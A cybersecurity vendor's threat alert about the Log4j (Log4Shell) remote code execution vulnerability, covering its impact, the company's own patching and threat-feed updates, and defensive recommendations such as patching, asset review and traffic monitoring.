Threat Alert: Log4j Vulnerability Update

zvelo Cyber Threat Intelligence:  Log4j Vulnerability Update

Log4j Vulnerability Overview

On December 9, 2021 researchers announced the discovery of Common Vulnerability Scoring System (CVSS) 10.0 score vulnerability for the open source Apache Log4j software library used in Java-based and Java-dependent web applications.  Of greatest concern with Common Vulnerabilities and Exposures (CVE) 2021-44228, is the ability for an attacker to exploit remote code execution (RCE) against internet facing web-servers without the need to authenticate.  This vulnerability was weaponized by Malicious Cyber Actors (MCA) within days of its release. As of December 13, 2021, the associated Java Naming and Directory Interface (JNDI) and associated Lightweight Directory Access Protocol (LDAP) command sequence were  found being used by multiple botnets.  The exploit termed “Log4Shell” continues to be actively exploited in the wild and affected organizations should take immediate action to update and monitor potentially impacted systems.

For more details on the Log4j threat, see the original post from December 9, 2021.

Key Facts:

1. Patches are currently available for CVE 2021-44228 and the related CVE 2021-45046 for Java 7 and Java 8 users that leverage Log4j.  These fixes prevent RCE via the Log4Shell exploit.
2. The full impact of the vulnerability and exploit are unknown.  This is due to tens of thousands of Java artifacts spread across multiple repositories having both direct and indirect dependencies on Log4j.
3. Cloud Service Providers (CSP) and their associated products are impacted (link to the growing list can be found in the references/resources section).
4. The attack signature for Log4Shell is known and does not use encryption.  This means that attempts to use Log4Shell against a vulnerable web-server can be detected, alerted, and prevented.
5. MCAs are leveraging their existing malicious infrastructure to exploit Log4Shell.  As a result, if an MCA attacks a vulnerable web-server with the Log4Shell exploit and takes control of the system, it would not be surprising to see malicious egress traffic to known bad infrastructure.

zveloCTI Actions:

1. zvelo assessed our operational systems and patched one impacted asset.  Result:  Backend systems secured to deliver best-in-class cyber threat intelligence and URL classification to our clients.
2. zvelo reviewed our zveloDB SDK code for any related dependencies.  No dependencies were discovered.  Result:  The zveloDB SDK is not vulnerable and customers can continue using this capability with confidence.  zvelo recommends all zveloDB SDK clients review their implementation from a cybersecurity perspective regardless.
3. Once Log4Shell was picked up by botnets (e.g. Mirai, Muhstik, and others), the zvelo Cybersecurity Team reviewed our Malicious Detailed Detection Feed (MDDF) product for related Indicators of Compromise (IOC).  The Team identified 1000s of full-path URLs, base and subdomains, and IP addresses already in MDDF associated with botnets and other MCA activities related to Log4Shell.  More Log4Shell IOCs are added to MDDF daily, with some also flowing to zveloDB.  Result:  zvelo customers were protected prior to exploitation and are receiving regular updates which assure further protection from Log4Shell depending upon product consumption and implementation.
4. The zvelo Cybersecurity Team continues to analyze numerous internal and external trusted data sources for additional Log4Shell IOCs.  When verified, these IOCs are added to MDDF.  Result:  zvelo customer protection against Log4Shell exploitation continues to expand.

Technical Recommendations:

1. Immediately patch systems known to be running Log4j. Assess all systems for direct and indirect dependencies on Log4j via Java, and patch those systems as well.
2. Review internet exposed systems (via a tool such as Shodan) to discover and identify any unknown assets.  Scan those systems and patch them immediately.
3. Review integrated third-party software for the Log4j vulnerability.  Coordinate with those vendors for patching support as required.  Coordinate with supporting CSPs and immediately implement any patches provided.
4. Implement Intrusion Detection System (IDS), Intrusion Prevention Systems (IPS), Firewall, and Security Information and Event Monitoring (SIEM) rules to monitor organization traffic (ingress for JNDI/LDAP and egress for connections outside of the norm).
5. Log4jShell is being and will be used by a variety of MCAs and botnet operators.  It is likely that the groups will leverage Log4Shell as an attack vector for the delivery of ransomware, data stealers, and other malware.  Organizations should review groups that may have interest in their activities and implement additional detection and alerting rules beyond CVE 2021-44228.

Please reach out to the zvelo Cybersecurity Team if you would like further information on Log4j, Log4Shell, and actions your organization can take to protect itself today.

Additional References and Resources on the Log4j Vulnerability:

• Log4j – https://logging.apache.org/log4j/2.x/ 
• CVSS – https://www.first.org/cvss/
• CISA Log4j Guidance – https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance 
• Swiss Computer Emergency Response Team (CERT) Log4j blog – https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/ 
• MITRE ATT&CK Groups – https://attack.mitre.org/groups/ 
• zvelo Log4j Alert – https://zvelo.com/threat-alert-log4j-used-to-exploit-exposed-systems/